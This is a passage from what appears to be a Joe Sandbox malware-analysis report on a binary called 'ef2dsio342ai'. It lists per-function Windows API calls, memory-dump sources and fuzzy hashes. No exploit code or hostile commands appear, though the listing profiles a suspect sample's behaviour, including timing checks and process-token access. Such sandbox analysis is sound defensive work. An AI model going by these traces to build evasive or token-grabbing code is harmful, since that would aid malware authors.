                                                                                                      • Opcode Fuzzy Hash: ab9b5f265cd236d5998c0aec92a045cf228a43000c1fcfa5b2d405d85cc90845
                                                                                                      • Instruction Fuzzy Hash: 40116DB1209714EBE7309F64EC08BA27BFDEF04B00F108929A55AD6550E7B0E9049BB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D7B5AF,?,00008000), ref: 00D7B9A0
                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D7B5AF,?,00008000), ref: 00D7B9C5
                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D7B5AF,?,00008000), ref: 00D7B9CF
                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D7B5AF,?,00008000), ref: 00D7BA02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 2875609808-0
                                                                                                      • Opcode ID: 62dbe27d9de3d8ca5795e81e51f3137a4dda43b5410b6906f8449470e3ab0e13
                                                                                                      • Instruction ID: cf4fd78b4d29ca4c9dbec20d72249d845f81a4806c3b36b831a4ab306b743edf
                                                                                                      • Opcode Fuzzy Hash: 62dbe27d9de3d8ca5795e81e51f3137a4dda43b5410b6906f8449470e3ab0e13
                                                                                                      • Instruction Fuzzy Hash: 59113C31C00729D7CF00AFE4D948BEDBB79FF09721F508096D985B2240EB7096518B75
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                      • String ID:
                                                                                                      • API String ID: 3016257755-0
                                                                                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                      • Instruction ID: 2e2255dd79e1a993063fca480af777cec99efec5f0722d26c3dcc69a582374d3
                                                                                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                      • Instruction Fuzzy Hash: B9014CB640018EBBCF129F84DC01CEE3F72FF09290B548415FE1899031D636DAB1AB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ___BuildCatchObject.LIBCMT ref: 1000EB07
                                                                                                        • Part of subcall function 1000F118: ___AdjustPointer.LIBCMT ref: 1000F161
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 1000EB1E
                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 1000EB30
                                                                                                      • CallCatchBlock.LIBCMT ref: 1000EB54
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                      • String ID:
                                                                                                      • API String ID: 2633735394-0
                                                                                                      • Opcode ID: b08c6303e5edd65cea512d3d25e291636a6d69fd322c116311922dc0a8ad3f33
                                                                                                      • Instruction ID: 462ea524e13ba9953d168ec3b5fe6c0550c8fc9377613bc0836cebba10fb4b4f
                                                                                                      • Opcode Fuzzy Hash: b08c6303e5edd65cea512d3d25e291636a6d69fd322c116311922dc0a8ad3f33
                                                                                                      • Instruction Fuzzy Hash: 3B012532500149FBEF129F95CC05EDB3BBAFF48790F118018FA1862125D736E8A1EBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00DA8792
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00DA87AA
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00DA87CE
                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DA87E9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 357397906-0
                                                                                                      • Opcode ID: 7d4e26a6d380c8ae7fd0c9f6596b324fd5e53b11b50953ad35b4a07a2e52980d
                                                                                                      • Instruction ID: a73903d9eb4f65180b2d91f46618d43ea8211bf2766d011012d63ef3f812cecc
                                                                                                      • Opcode Fuzzy Hash: 7d4e26a6d380c8ae7fd0c9f6596b324fd5e53b11b50953ad35b4a07a2e52980d
                                                                                                      • Instruction Fuzzy Hash: 6F1140B9D0020DAFDB41CFA8C884AEEBBB5FB09310F148166E915E3610D735AA548F60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D73655
                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D73666
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00D7366D
                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D73674
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2710830443-0
                                                                                                      • Opcode ID: daef66b15527523a25e45bb3e1ccb4816400cffe787dac3198e2fb50c78c7b0a
                                                                                                      • Instruction ID: f2c0041fb1ad05173a60547074b5a3fcce919b111171e9c300d7d2bfa482bfd1
                                                                                                      • Opcode Fuzzy Hash: daef66b15527523a25e45bb3e1ccb4816400cffe787dac3198e2fb50c78c7b0a
                                                                                                      • Instruction Fuzzy Hash: C5E06D71101328BBDB201B669C4DEEB7F6DDB53BA1F580019F10BD2290EAA0C940D2B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D11ED9: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D11F33
                                                                                                        • Part of subcall function 00D11ED9: SelectObject.GDI32(?,00000000), ref: 00D11F42
                                                                                                        • Part of subcall function 00D11ED9: BeginPath.GDI32(?), ref: 00D11F59
                                                                                                        • Part of subcall function 00D11ED9: SelectObject.GDI32(?,00000000), ref: 00D11F82
                                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00DA91E6
                                                                                                      • LineTo.GDI32(?,?,?), ref: 00DA91F3
                                                                                                      • EndPath.GDI32(?), ref: 00DA9203
                                                                                                      • StrokePath.GDI32(?), ref: 00DA9211
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                      • String ID:
                                                                                                      • API String ID: 1539411459-0
                                                                                                      • Opcode ID: e8c23915afa6511b35aab340326bf8e2fdd3638a64ac14e57ef6d490691ec3cd
                                                                                                      • Instruction ID: 5ab84e288e9996e09cdeb7262f4f59ce11b031c30a110f77815f5cd700871fd4
                                                                                                      • Opcode Fuzzy Hash: e8c23915afa6511b35aab340326bf8e2fdd3638a64ac14e57ef6d490691ec3cd
                                                                                                      • Instruction Fuzzy Hash: BDF03A31081358BADB126F54AC0DFCA3A5AAF06310F548100FA12A52E2C7755562CFB9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetSysColor.USER32(00000008), ref: 00D1216C
                                                                                                      • SetTextColor.GDI32(?,?), ref: 00D12176
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00D12189
                                                                                                      • GetStockObject.GDI32(00000005), ref: 00D12191
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$ModeObjectStockText
                                                                                                      • String ID:
                                                                                                      • API String ID: 4037423528-0
                                                                                                      • Opcode ID: 5a6c195ff1e496ee169071f08678eb27a131a36128683ca4c2f43322ae0531f5
                                                                                                      • Instruction ID: 81e064be6dbcb1f4f726727a97f255aafa581b7c456637e6e8ed48932efa1553
                                                                                                      • Opcode Fuzzy Hash: 5a6c195ff1e496ee169071f08678eb27a131a36128683ca4c2f43322ae0531f5
                                                                                                      • Instruction Fuzzy Hash: 46E06531640740BEDB215B74BC097E87B21AB13336F088219FBBB841E0C77246959B31
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentThread.KERNEL32 ref: 00D71EC4
                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00D71A69), ref: 00D71ECB
                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D71A69), ref: 00D71ED8
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00D71A69), ref: 00D71EDF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                                      • String ID:
                                                                                                      • API String ID: 3974789173-0
                                                                                                      • Opcode ID: 01a169799251876ede4c490d4431f70117936db640dbe2cb1f56d5d6491e6427
                                                                                                      • Instruction ID: 30c42b4c321aad524d8a2ae53ed8088ebe88b1f88d869fa00e6364ad4488cc1a
                                                                                                      • Opcode Fuzzy Hash: 01a169799251876ede4c490d4431f70117936db640dbe2cb1f56d5d6491e6427
                                                                                                      • Instruction Fuzzy Hash: C0E086356013119BE7301FA49D0DB973B7DBF42791F148808BA86C9080E6388445C774
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetDesktopWindow.USER32 ref: 00D6EBD6
                                                                                                      • GetDC.USER32(00000000), ref: 00D6EBE0
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D6EC00
                                                                                                      • ReleaseDC.USER32(?), ref: 00D6EC21
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2889604237-0
                                                                                                      • Opcode ID: 85cf961c60e79e1531c7261e2c6d45881966a04b69773a52fd9d873b9cebf9b3
                                                                                                      • Instruction ID: a015876faaa9e0812731bf0b6968cbc20671663322a68a10adc19b79c818f6fa
                                                                                                      • Opcode Fuzzy Hash: 85cf961c60e79e1531c7261e2c6d45881966a04b69773a52fd9d873b9cebf9b3
                                                                                                      • Instruction Fuzzy Hash: 15E01AB5800309EFCB50AFA09808A6DBBB2FB08310F148449E84BE3710CB3889419F24
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetDesktopWindow.USER32 ref: 00D6EBEA
                                                                                                      • GetDC.USER32(00000000), ref: 00D6EBF4
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D6EC00
                                                                                                      • ReleaseDC.USER32(?), ref: 00D6EC21
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2889604237-0
                                                                                                      • Opcode ID: 38af281671c1aa73f2e9e1c3d71d424b6d2b8d552a84e0d56dd8755c746813f1
                                                                                                      • Instruction ID: e89d8ec2f2c6a32af2f6515f67111ab9fb7ab82075e380d5e7e174154f2d15d2
                                                                                                      • Opcode Fuzzy Hash: 38af281671c1aa73f2e9e1c3d71d424b6d2b8d552a84e0d56dd8755c746813f1
                                                                                                      • Instruction Fuzzy Hash: AFE09AB5D00309EFCB51AFA0990865DBBB6FB49311F158449E94AE3750CB3899419F64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ___free_lconv_mon.LIBCMT ref: 100147C7
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 10014448
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 1001445A
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 1001446C
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 1001447E
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 10014490
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 100144A2
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 100144B4
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 100144C6
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 100144D8
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 100144EA
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 100144FC
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 1001450E
                                                                                                        • Part of subcall function 1001442D: _free.LIBCMT ref: 10014520
                                                                                                      • _free.LIBCMT ref: 100147CD
                                                                                                        • Part of subcall function 100054A4: HeapFree.KERNEL32(00000000,00000000,?,1000D9D6,00000000,00000001,00000000,?,0000001C,?,10004D4B,1000471D,10023A08), ref: 100054B8
                                                                                                        • Part of subcall function 100054A4: GetLastError.KERNEL32(00000000,?,1000D9D6,00000000,00000001,00000000,?,0000001C,?,10004D4B,1000471D,10023A08), ref: 100054CA
                                                                                                      • _free.LIBCMT ref: 100147D6
                                                                                                      • _free.LIBCMT ref: 100147DF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                      • String ID:
                                                                                                      • API String ID: 161543041-0
                                                                                                      • Opcode ID: 5a1e1a0ce94a6b92db9be0ddcb94ef7f203e2266e041b7389e4c59c14ce00a45
                                                                                                      • Instruction ID: b8ca21a60894fa25f7c87d1784549678330a1af90d3587343e6d7e2d23b2cc36
                                                                                                      • Opcode Fuzzy Hash: 5a1e1a0ce94a6b92db9be0ddcb94ef7f203e2266e041b7389e4c59c14ce00a45
                                                                                                      • Instruction Fuzzy Hash: A8D0C9A9940204A7EF40E7B48982CCE322CDF48167B00084076005E107C975E6808722
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D14154: _wcslen.LIBCMT ref: 00D14159
                                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00D8582E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Connection_wcslen
                                                                                                      • String ID: *$LPT
                                                                                                      • API String ID: 1725874428-3443410124
                                                                                                      • Opcode ID: 61394a6bd762ac82879d78ad44b242d083a12d4e743e861feefa93285b9144e4
                                                                                                      • Instruction ID: f60ec3b0dfb28d8e9f25a0ae21f6f0da071e349f19c1acab7e99fc811ddf8e24
                                                                                                      • Opcode Fuzzy Hash: 61394a6bd762ac82879d78ad44b242d083a12d4e743e861feefa93285b9144e4
                                                                                                      • Instruction Fuzzy Hash: 09916E75A00604EFCB14EF54D484EAABBF5EF44314F188099E84A9F366C731EE85CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00D3E69D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorHandling__start
                                                                                                      • String ID: pow
                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                      • Opcode ID: 85fc6fcf5ebf945ab854f6342f4d68b2e3b291efcb308a1bcf75d7fa490a6135
                                                                                                      • Instruction ID: ec022551b0816543f3f8fd6a64a2b8a22f56dc5878aec43c026b256707d48309
                                                                                                      • Opcode Fuzzy Hash: 85fc6fcf5ebf945ab854f6342f4d68b2e3b291efcb308a1bcf75d7fa490a6135
                                                                                                      • Instruction Fuzzy Hash: 74512661E08302D7CB117714DD823BE2BA4EB50780F284E59F0D2862E9EF358C95BA76
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: #
                                                                                                      • API String ID: 0-1885708031
                                                                                                      • Opcode ID: 294a10f64735a63e7600e2511de7815be0e784fc5dae34ea69bec2f64077db27
                                                                                                      • Instruction ID: 8c413a1de596ecf27fd51a89e08f991ea11d76b3dbe08a605c1d1f89f02f6c28
                                                                                                      • Opcode Fuzzy Hash: 294a10f64735a63e7600e2511de7815be0e784fc5dae34ea69bec2f64077db27
                                                                                                      • Instruction Fuzzy Hash: 81513F30504256DFDF25DF28E480AFA7BA2EF25314F684156E8919B290DF34ED82DB71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      • Opcode ID: 22a2a250079216a4fb6bc96a55df862ab42e51232b2a3f681037dae0298c7b53
